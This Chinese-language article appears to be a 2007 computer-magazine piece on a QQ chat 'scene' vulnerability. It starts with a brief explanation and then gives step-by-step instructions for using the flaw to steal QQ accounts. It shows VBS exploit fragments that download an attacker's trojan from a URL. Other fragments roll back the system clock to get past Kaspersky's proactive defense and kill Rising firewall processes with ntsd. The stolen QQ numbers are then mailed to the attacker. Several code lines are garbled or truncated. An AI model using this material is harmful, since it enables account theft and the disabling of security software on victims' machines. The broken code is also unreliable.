根據易觀國際釋出《2007年第2季度中國即時通訊市場季度監測》報告顯示,中國活躍的IM軟體賬號已經達到了3.76億個,其中擁有2.9億活躍使用者賬號的騰訊QQ是當之無愧的IM王者。可是你知道嗎,你的QQ 現在很危險了!
不需要什麼高超的技巧,黑客就可以輕鬆地盜取你的QQ。想知道他們是怎麼做的以及該如何避免自己的QQ被盜嗎?快隨小編一起看看QQ場景漏洞的破解之法(屬於0DAY漏洞)。
月黑風高夜,黑客挖出了一個寶箱,裡面盛放著光彩奪目的“QQ場景漏洞”。他們驚奇的發現,不需要有什麼高超的技巧,只要懂一點基本的指令碼程式碼編寫,就可以輕鬆地盜取別人的QQ、祕密安裝監控軟體或破壞系統等。於是,地獄之門就被打開了,所有的QQ使用者都被恐懼籠罩著。
一、QQ場景漏洞的利用原理解析
聊天場景是QQ軟體中的一項基本功能,可以讓聊天的雙方使用同樣的場景,從而拉近聊天使用者之間的距離。不過最新的QQ場景漏洞,可能會讓大家的QQ有被盜的風險。
該漏洞的利用原理很簡單,攻擊者向其QQ列表內的使用者傳送一個惡意構造的場景,場景裡面包括圖片檔案、檔案和檔案,其中檔案就是編寫惡意程式碼的地方,然後在遠端系統中執行即可。
二、QQ場景漏洞的危害有多大
QQ場景漏洞的危害到底多大?重則可能系統崩潰,資料消失;輕則可能QQ被盜,這些後果都是很嚴重的。更可怕的是,漏洞的利用方法特別簡單,不需要什麼操作即可實現,會成為大量手癢的菜鳥黑客們的最愛。
新增的指令碼程式碼的作用不同,造成的危害性也會不同。比如,如果是一段檔案下載指令碼程式碼的話,那麼程式碼就會自動下載設定的檔案並默默地執行。如果下載的是木馬後門程式的話,黑客就可以通過木馬進行遠端控制。如果是一段格式化程式碼的話,那麼磁碟中的檔案就會瞬間被清除掉。
小提示:QQ場景漏洞的危害程度判斷是參考了標準的次高危害漏洞(百度搜霸遠端執行漏洞)和標準的中等危害漏洞(WMP AU檔案除零漏洞)。
三、試用QQ場景漏洞
首先,將QQ場景漏洞所需的場景檔案下載到本地系統,解壓後複製到系統中QQ的安裝目錄X:Program FilesTencentQQ下
面,這樣在Scene資料夾中就多了一個場景目錄。現在我們就可以進行測試操作,不過為了彈出視窗更加有個性化,我們要對場景目錄真的指令碼檔案進行修改。
接著,用文字編輯器開啟其中的檔案,在檔案程式碼中找到MsgBox這個訊息函式,該函式後面跟著的就是該場景在執行後彈出的資訊內容,這裡我們可以將它設定為自己需要彈出的內容資訊,比如設定為“電腦報,我的最愛!”。如果你熟悉VBS指令碼,可以設定更有個性的語句。
圖1 彈出視窗
然後,隨便在QQ聯絡人列表中找一個人,無論對方使用的是QQ還是TM都可以,雙擊開啟其聊天視窗。然後點選工具欄中的“選擇音樂場景”按鈕,在彈出的視窗中選擇開啟“我的場景”標籤,並且找到一個和場景目錄名稱相同的場景。這樣這個帶有VBS指令碼的場景,就會自動的下載到遠端好友的QQ 中並執行。
四、如何利用QQ場景漏洞盜QQ
漏洞用熟後,就可以開始盜QQ了。首選下載該漏洞的利用程式碼,然後進行簡單的修改即可。下面就對程式碼的關鍵部分進行講解。
iLocal = LCase("c:"):iRemote = LCase("http://www.****")
程式碼作用是將檔案下載到磁碟中指定的位置,我們只需要把其中的.****改為自己的木馬地址即可。
Set ws = CreateObject("l")
"cmd /c set date=%date% &&date 1988-1-1 &&ping -n 30 &&date %date%",vbhide
for each ps in getobject("winmgmts:.rootcimv2:win32_process")ances_
if ="" then
"ntsd -c q -p le",0
這段程式碼主要有兩個作用,首先是通過修改系統的時間,從而讓下載的木馬程式躲過卡巴斯基的主動防禦功能。接著用於檢測系統中是否存在瑞星防火牆,如果存在的話就結束該防火牆的程序。
當然我們可以依葫蘆畫瓢來新增結束其他程序的程式碼,比如要結束金山網鏢的程序,只需要將程式碼if ="" Then中的,替換為金山網鏢的程序名稱即可。經過這一系列的處理以後,盜號木馬就能成功的獲取遠端使用者的QQ號碼,並且最終傳送到我們指定的信箱裡面呢。
